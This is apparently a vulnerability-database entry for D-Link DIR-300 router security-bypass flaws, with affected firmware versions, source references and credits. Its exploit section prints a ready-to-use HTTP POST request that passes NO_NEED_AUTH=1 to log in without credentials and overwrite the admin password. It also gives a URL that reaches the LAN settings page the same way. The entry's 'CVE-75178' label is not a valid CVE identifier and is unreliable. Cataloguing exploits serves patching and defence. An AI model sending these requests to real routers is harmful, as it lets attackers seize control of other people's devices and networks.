Sign-up

ID

VAR-E-201011-0895


EDB ID

34986


TITLE

D-Link DIR-300 - Multiple Security Bypass Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 34986

DESCRIPTION

D-Link DIR-300 - Multiple Security Bypass Vulnerabilities. CVE-75178 . remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 34986

AFFECTED PRODUCTS

vendor:d linkmodel:dir-300scope: - version: -

Trust: 1.6

vendor:d linkmodel:dir-615 4.13b01scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-320scope:eqversion:0

Trust: 0.3

vendor:d linkmodel:dir-300 2.05b03scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:2.04

Trust: 0.3

vendor:d linkmodel:dir-300 2.01b1scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-300 1.05b09scope: - version: -

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:1.05

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:1.04

Trust: 0.3

vendor:d linkmodel:dir-300scope:eqversion:0

Trust: 0.3

sources: BID: 44743 // EXPLOIT-DB: 34986 // EDBNET: 56240

EXPLOIT

source: https://www.securityfocus.com/bid/44743/info

The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities.

Remote attackers can exploit these issues to bypass security restrictions, access certain administrative functions, alter configuration, and compromise the affected device.

D-Link DIR-300 running firmware 2.01B1, 1.04, 1.05 are vulnerable. Additional models and firmware versions may also be affected.

POST http://www.example.com:80/tools_admin.php HTTP/1.1
Host: www.example.com
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh

http://www.example.com/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0

Trust: 1.0

sources: EXPLOIT-DB: 34986

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 34986

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 34986

TYPE

Multiple Security Bypass Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 34986 // EDBNET: 56240

CREDITS

Karol Celia

Trust: 0.6

sources: EXPLOIT-DB: 34986

EXTERNAL IDS

db:BIDid:44743

Trust: 1.9

db:EXPLOIT-DBid:34986

Trust: 1.6

db:EDBNETid:56240

Trust: 0.6

sources: BID: 44743 // EXPLOIT-DB: 34986 // EDBNET: 56240

REFERENCES

url:https://www.securityfocus.com/bid/44743/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/34986/

Trust: 0.6

url:http://www.dlink.com/

Trust: 0.3

sources: BID: 44743 // EXPLOIT-DB: 34986 // EDBNET: 56240

SOURCES

db:BIDid:44743
db:EXPLOIT-DBid:34986
db:EDBNETid:56240

LAST UPDATE DATE

2022-07-27T09:19:23.456000+00:00


SOURCES UPDATE DATE

db:BIDid:44743date:2010-12-03T10:55:00

SOURCES RELEASE DATE

db:BIDid:44743date:2010-11-09T00:00:00
db:EXPLOIT-DBid:34986date:2010-11-09T00:00:00
db:EDBNETid:56240date:2010-11-09T00:00:00